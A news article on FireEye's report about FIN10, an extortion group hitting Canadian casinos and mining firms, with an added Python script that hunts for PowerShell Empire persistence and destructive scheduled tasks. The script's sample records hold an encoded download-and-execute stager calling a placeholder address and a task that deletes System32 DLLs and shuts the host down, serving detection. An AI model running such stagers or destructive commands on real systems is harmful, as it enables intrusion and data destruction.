FireEye, Inc. has observed an actor carrying out financially motivated intrusion operations – targeting organizations in North America, but predominantly in Canada – that may require a different type of response, the company suggests in a new report.
Believed to be carried out by a previously unobserved actor or group FireEye calls FIN10, the intrusion operations – mostly against casinos and mining organizations in North America, with a focus on Canada – date back to at least 2013, continued through 2016 and were still active as recently as early June, the California-based, intelligence-led security firm reported Friday.
The intrusions involved attacker(s) compromising organizations’ networks and seeking “to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations,” the report, FIN10: Anatomy of a Cyber Extortion Operation, states.
The report points out that FIN10 relies primarily on publicly available software, scripts and techniques to gain a foothold in victims’ networks. Proof of the stolen data is then posted on publicly accessible websites and a ransom demanded.
In all but one targeted intrusion attributed to FIN10, a sum payable in Bitcoin was demanded. Requested sums ranged from 100 to 500 Bitcoins (roughly $124,000 to $620,000 as of mid-April 2017).
“Failure to pay the threat group could result in the public release of stolen data and potential disruption or destruction of the victim’s information assets and systems,” the report notes.
Although there is insufficient evidence to determine the initial infection vector, it points out, in at least two intrusions, FIN10 leveraged spear phishing emails with malicious attachments, “making it plausible that this methodology was used across all breaches.”
FIN10 used Meterpreter – short for Meta-Interpreter, an advanced payload included in the Metasploit Framework – as the primary method of establishing an initial foothold within victim environments. “Meterpreter and most of its extensions are executed in memory, thus largely evading detection by standard anti-virus.”
In addition, “in the majority of cases, we observed FIN10 leveraging PowerShell Empire (a pen-testing tool that utilizes PowerShell) for elevated persistence, mainly by utilizing the Registry and Scheduled Task options,” it explains. “We have regularly observed FIN10 use scheduled tasks as a persistence mechanism.”
Network degradation activity “typically consisted of the attacker(s) creating scheduled tasks on multiple systems within the targeted network environment to disrupt the normal operations of those systems by rendering their operating systems unusable.”
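The two persistence options the report names for PowerShell Empire (Registry Run values and scheduled tasks) and the destructive scheduled tasks it describes both leave records a defender can hunt in: Windows Security Event ID 4698 (a scheduled task was created, with the task XML in the event) and Sysmon Event ID 13 (a registry value was set). The script below is an added example written for this article, not FireEye’s code or FIN10’s actual tooling; the event records, the task names, the stager script and the 198.51.100.10 address are all constructed here. It flags PowerShell launchers carrying the usual Empire-style switches, decodes an -EncodedCommand payload to see what it does, and separately flags task actions that delete system files or shut the host down.

```python
"""Hunt for Empire-style persistence and destructive scheduled tasks.

Added example, not FireEye's code. The records below are constructed to stand in
for Security 4698 and Sysmon 13 events as a SIEM or EVTX parser would hand them over.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Launcher switches typical of Empire/Metasploit PowerShell stagers.
EVASION_FLAGS = re.compile(
    r"(?i)(-e(?:nc(?:odedcommand)?)?\b|-nop\b|-noni\b|-w(?:indowstyle)?\s+hidden"
    r"|-e(?:p|xecutionpolicy)\s+bypass)")
# What a decoded stager usually does: fetch and run a second stage.
SCRIPT_INDICATORS = re.compile(
    r"(?i)(downloadstring|downloadfile|frombase64string|invoke-expression|\biex\b|net\.webclient)")
# Actions that wipe files, backups or boot configuration, or power the host off.
DESTRUCTIVE_CMDS = re.compile(
    r"(?i)(\b(?:del|erase|rd|rmdir)\b|remove-item|\bformat\b|vssadmin\b.*\bdelete\b"
    r"|\bwbadmin\b.*\bdelete\b|\bbcdedit\b|\bshutdown\b)")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\(?:Run|RunOnce)$")


def decode_encoded_command(cmd):
    """Return the UTF-16LE script behind -e/-enc/-EncodedCommand, or '' if none."""
    m = re.search(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess_command(cmd):
    """Return the reasons a command line looks like extortion-actor tradecraft ([] if clean)."""
    reasons = []
    if re.search(r"(?i)\bpowershell(?:\.exe)?\b", cmd) and EVASION_FLAGS.search(cmd):
        reasons.append("powershell launcher with evasion flags")
    if SCRIPT_INDICATORS.search(decode_encoded_command(cmd)):
        reasons.append("encoded command downloads or executes code")
    if DESTRUCTIVE_CMDS.search(cmd):
        reasons.append("destructive command")
    return reasons


def task_command_line(task_xml):
    """Join <Command> and <Arguments> of the task's <Exec> action."""
    root = ET.fromstring(task_xml)
    parts = [root.findtext(f".//t:Actions/t:Exec/t:{tag}", "", TASK_NS)
             for tag in ("Command", "Arguments")]
    return " ".join(p.strip() for p in parts if p)


def assess_task_event(ev):
    """ev: one 4698 record {TaskName, SubjectUserName, TaskContent}."""
    cmd = task_command_line(ev["TaskContent"])
    reasons = assess_command(cmd)
    if not reasons:
        return None
    return {"source": f"4698 task {ev['TaskName']} created by {ev['SubjectUserName']}",
            "command": cmd, "decoded": decode_encoded_command(cmd), "reasons": reasons}


def assess_registry_event(ev):
    """ev: one Sysmon 13 record {TargetObject, Details}; only Run/RunOnce values matter."""
    key, _, value_name = ev["TargetObject"].rpartition("\\")
    if not RUN_KEY.search(key):
        return None
    reasons = assess_command(ev["Details"])
    if not reasons:
        return None
    return {"source": f"Sysmon 13 Run value {value_name} under {key}", "command": ev["Details"],
            "decoded": decode_encoded_command(ev["Details"]), "reasons": reasons}


def hunt(task_events, reg_events):
    findings = [assess_task_event(e) for e in task_events] + [assess_registry_event(e) for e in reg_events]
    return [f for f in findings if f]


# ---- Constructed sample records (hypothetical, not real FIN10 artifacts) ----
def task_xml(command, arguments):
    """Minimal Task Scheduler XML as logged in the TaskContent field of 4698."""
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
            f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
            f'<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>')


def encoded_launcher(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical stager; 198.51.100.10 is a documentation (TEST-NET-2) address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/launcher')"
LAUNCHER_ARGS = "-NoP -NonI -W Hidden -Enc " + encoded_launcher(STAGER)

TASK_EVENTS = [
    {"TaskName": r"\Updater", "SubjectUserName": "jdoe",
     "TaskContent": task_xml("powershell.exe", LAUNCHER_ARGS)},
    {"TaskName": r"\SystemMaintenance", "SubjectUserName": "svc_backup",
     "TaskContent": task_xml("cmd.exe", r"/c del /f /q C:\Windows\System32\*.dll & shutdown /s /t 0")},
    {"TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "SubjectUserName": "SYSTEM",
     "TaskContent": task_xml(r"%windir%\system32\defrag.exe", "-c -h -k -g")},
]
REG_EVENTS = [
    {"TargetObject": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe " + LAUNCHER_ARGS},
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup",
     "Details": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"},
]

if __name__ == "__main__":
    for f in hunt(TASK_EVENTS, REG_EVENTS):
        print(f["source"], "->", ", ".join(f["reasons"]))
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

Run stand-alone, the script reports the two constructed persistence entries (task and Run value) together with the decoded download-and-execute stager, reports the constructed destructive task, and stays silent on the built-in defrag task and the Security Health Run value. Because 4698 auditing is off by default (it lives under Object Access, Audit Other Object Access Events), the first check in a real environment is whether those events are being collected at all; the same heuristics apply to EDR process-creation telemetry where they are not.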
Once contact was made, “FIN10 also seeks to increase its leverage by sending multiple emails to staff and board members of the victim organizations, notifying them of the breach and potential consequences for non-payment,” the report points out.
“We believe the primary goal of FIN10 is to steal corporate business data, files, records, correspondence and customer PII (personally identifiable information) for the purposes of extorting victim organizations for the non-release of the stolen data.”
“In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems,” states the report.
“The relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion-based campaigns at least in the near term,” FireEye reports. “Notably, we already have some evidence to suggest FIN10 has targeted additional victims beyond currently confirmed targets,” the report adds.
Unlike breaches where a containment plan may be able to stop an attacker from stealing more information, it states, “in these disruptive instances, the damage may have already been done by the time the attacker(s) contacts the victim organization.”
Lessons learned from investigating FIN10 and other disruptive breaches suggest affected organizations do the following:
confirm that there is a breach – examine the environment for evidence of compromise before considering paying the ransom;
remember that the company is dealing with a human adversary – carefully consider how an attacker will react to action or inaction;
timing is critical – validate and scope the breach as quickly as possible;
stay focused – evaluate if the tasks being taken on will help to mitigate, detect, respond to or contain the attack;
carefully evaluate whether to engage with the attacker(s) – attackers do not always expect a response;
engage the experts before a breach – identify partners before the breach and get them on retainer;
consider all options when asked to pay a ransom – there is no guarantee the attacker(s) will not come back for more money or simply leak the data anyway;
ensure strong segmentation and controls over back-ups – tighten access to the back-up environment to mitigate the risk of an attacker accessing the system using compromised credentials and destroying back-ups;
immediately focus on broader security improvements once the incident has been handled – ensure the full extent of the breach is understood and implement both tactical and strategic actions to prevent future attackers from gaining access; and
know that attackers may come back in a different way – operationalize and enhance the temporary solutions that were deployed to immediately address the attack.